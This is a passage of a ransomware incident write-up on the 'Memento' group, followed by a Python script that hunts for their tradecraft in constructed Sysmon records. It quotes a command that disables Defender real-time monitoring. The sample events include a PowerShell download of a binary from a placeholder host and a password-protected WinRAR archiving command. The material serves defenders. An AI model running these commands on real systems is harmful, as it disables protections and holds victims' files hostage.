In late October, Sophos MTR’s Rapid Response Team encountered a new ransomware group with an interesting approach to holding victims’ files hostage. The ransomware used by this group, who identify themselves as “Memento Team,” doesn’t encrypt files. Instead, it copies files into password-protected archives, using a renamed freeware version of the legitimate file utility WinRAR, and then encrypts the password and deletes the original files. This was a retooling by the ransomware actors, who initially attempted to encrypt files directly but were stopped by endpoint protection. After failing on the first attempt, they changed tactics and re-deployed, as evidenced by the multiple versions of the ransomware payload, compiled at different times, found on the victim’s network. They then demanded $1 million US to restore the files, and threatened data exposure if the victim did not comply.

There were some other twists to the “Memento” attack as well. The ransomware itself is a Python 3.9 script compiled with PyInstaller. And in a ransom note that largely cribs the format used by REvil (including the “What’s Happen” introduction), the criminals behind the ransomware instructed the victims to contact them via a Telegram account.

The ransomware actors appear to have taken advantage of a flaw in VMware’s vCenter Server web client first revealed in February. The vulnerability allowed anyone who had TCP/IP port 443 access to the server to execute commands remotely with system-level privileges; a firewall had been misconfigured, and the vCenter Server was exposed to the Internet on that port. The Memento actors also waited a long time before executing their attack, so long that at least two different cryptocurrency miners were dropped onto the server they used for initial access during the course of their dwell time by different intruders using similar exploits. The attackers also deployed an open-source Python-based keylogger on several machines as they moved laterally within the network using Remote Desktop Protocol.

While there are hints of the actors behind this attack gaining access to the targeted network as early as mid-April, the first real signs of intrusion were on May 4: PyInstaller-compiled versions of two tools from the Impacket toolset, the wmiexec remote shell tool (which executes commands via Windows Management Instrumentation) and the secretsdump hash dumping tool, were dropped onto a Windows server. This server had outdated malware protection and was not configured with endpoint detection and response. The hash dump tool was likely used to acquire credentials for accounts that would be used later. Six days later, they came back and began further setting up shop, first using a PowerShell command to attempt to turn off malware scanning:

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Next, the intruders started using PowerShell web requests to pull down files: first, a copy of a command-line version of the WinRAR utility, and then a pair of RAR archives on the compromised server.
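As an added example (not code from the Sophos write-up, and not the actors’ tooling), the following Python script turns the behaviours described above into hunting checks over Sysmon-style process-creation records: Defender real-time monitoring switched off with Set-MpPreference, PowerShell web requests that fetch executables or RAR archives, a renamed WinRAR console binary creating password-protected archives, and cmd.exe spawned by the WMI provider host, which is the footprint WMI-based remote execution such as wmiexec leaves. The sample events, the hostname files.example.invalid, the file names arc.exe and docs.rar, and the assumption that Sysmon reports OriginalFileName as Rar.exe for the WinRAR console tool are all my own constructions; the Set-MpPreference cmdlet and WinRAR’s -p / -hp password switches are real.

```python
"""Hunting heuristics for the Memento-style tradecraft described in the write-up.

Added example; not Sophos code and not the actors' tooling. Scans constructed
Sysmon-style process-creation records (a subset of Event ID 1 fields: Image,
CommandLine, ParentImage, OriginalFileName). Field names follow Sysmon; every
sample event, hostname and path below is made up.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    evidence: str


# Defender real-time monitoring disabled from the command line.
DEFENDER_OFF = re.compile(
    r"Set-MpPreference\b.*?-DisableRealtimeMonitoring\s+\$?true\b", re.I)
# Common PowerShell download primitives (illustrative list, not exhaustive).
PS_DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer",
    re.I)
# A URL whose path ends in an executable or RAR archive.
REMOTE_BINARY = re.compile(r"https?://\S+\.(?:rar|exe)\b", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _rar_add_with_password(cmdline: str) -> bool:
    """True when a rar 'a'/'u'/'m' command carries a -p<pwd> or -hp<pwd> switch.
    Tokenisation is a plain whitespace split, which is enough for this heuristic."""
    tokens = cmdline.split()
    if len(tokens) < 3 or tokens[1].lower() not in {"a", "u", "m"}:
        return False
    return any(re.match(r"^-(?:hp|p)", t, re.I) for t in tokens[2:])


def scan(events: Iterable[Dict[str, str]]) -> List[Finding]:
    """Apply every heuristic to each event; return findings in event order."""
    findings: List[Finding] = []
    for ev in events:
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        parent = ev.get("ParentImage", "")
        original = ev.get("OriginalFileName", "")
        exe = _basename(image)

        if DEFENDER_OFF.search(cmd):
            findings.append(Finding("defender_realtime_disabled", image, cmd))

        if exe in {"powershell.exe", "pwsh.exe"} and PS_DOWNLOAD.search(cmd):
            m = REMOTE_BINARY.search(cmd)
            if m:
                findings.append(Finding("powershell_fetches_binary", image, m.group(0)))

        # Sysmon takes OriginalFileName from the PE version resource, so a renamed
        # copy of WinRAR's console tool still reports it (assumed here to be "Rar.exe").
        if original.lower() == "rar.exe":
            if exe != "rar.exe":
                findings.append(Finding("renamed_winrar", image, f"OriginalFileName={original}"))
            if _rar_add_with_password(cmd):
                findings.append(Finding("rar_password_archive", image, cmd))

        # cmd.exe under WmiPrvSE.exe is the shape WMI-driven remote execution takes.
        if exe == "cmd.exe" and _basename(parent) == "wmiprvse.exe":
            findings.append(Finding("cmd_spawned_by_wmi_host", image, cmd))
    return findings


# Constructed Sysmon-style records for demonstration; not from the incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Set-MpPreference -DisableRealtimeMonitoring $true",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Invoke-WebRequest -Uri http://files.example.invalid/rar.exe -OutFile C:\Windows\Temp\arc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Windows\Temp\arc.exe",  # renamed WinRAR console binary
     "CommandLine": r"arc.exe a -hpPLACEHOLDER -r C:\Windows\Temp\docs.rar C:\Users\*.docx",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Rar.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "OriginalFileName": "Cmd.Exe"},
    # Benign: an admin reads Defender settings; WinRAR runs from its install path without a password.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-MpPreference",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a backup.rar C:\Reports',
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "Rar.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.image}  <- {f.evidence}")
```

Command-line matching like this misses encoded or obfuscated PowerShell, so in practice the Set-MpPreference check should also run over script block logs (PowerShell operational log Event ID 4104) and be corroborated with Defender’s own operational event log, and the renamed-binary check depends on the EDR or Sysmon configuration actually recording OriginalFileName. The benign events at the end show the intended false-positive boundary: reading Defender preferences and running WinRAR from its install directory without a password switch produce no findings.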